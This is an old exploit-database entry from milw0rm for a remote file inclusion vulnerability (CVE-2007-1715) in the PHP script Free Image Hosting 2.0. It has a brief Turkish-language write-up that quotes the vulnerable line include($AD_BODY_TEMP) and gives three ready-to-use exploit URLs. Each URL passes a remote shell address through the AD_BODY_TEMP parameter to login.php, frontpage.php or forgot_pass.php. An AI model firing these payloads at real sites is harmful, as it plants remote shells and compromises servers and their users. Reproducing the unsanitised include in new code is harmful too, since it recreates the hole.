Free Image Hosting 2.0 - 'AD_BODY_TEMP' Remote File Inclusion
Author: Crackers_Child
type: webapps
platform: php
port:
date_added: 2007-03-24
date_updated:
verified: 1
codes: OSVDB-37179;CVE-2007-1715
tags:
aliases:
screenshot_url:
application_url:
############################################################################################
Baslik :Image_Upload Script Remote File Inclusion Exploit
Free Image Hosting 2.0
.ndir : http://free-php-scripts.net/scripts/Image_Upload.zip
Bulan :Crackers_Child
Zay.flk : <td><div align="center"><?php include($AD_BODY_TEMP);?></div></td>
Exploit : www.site.com/imageupload_path/login.php?AD_BODY_TEMP=Shell?
: www.site.com/imageupload_path/frontpage.php?AD_BODY_TEMP=Shell?
:www.site.com/imageupload_path/forgot_pass.php?AD_BODY_TEMP=Shell ?
Not :[Olmek Var$a Kaderde Dert Ekleme Derdine ;) ]
Greetz : EveryBody
############################################################################################
# milw0rm.com [2007-03-25]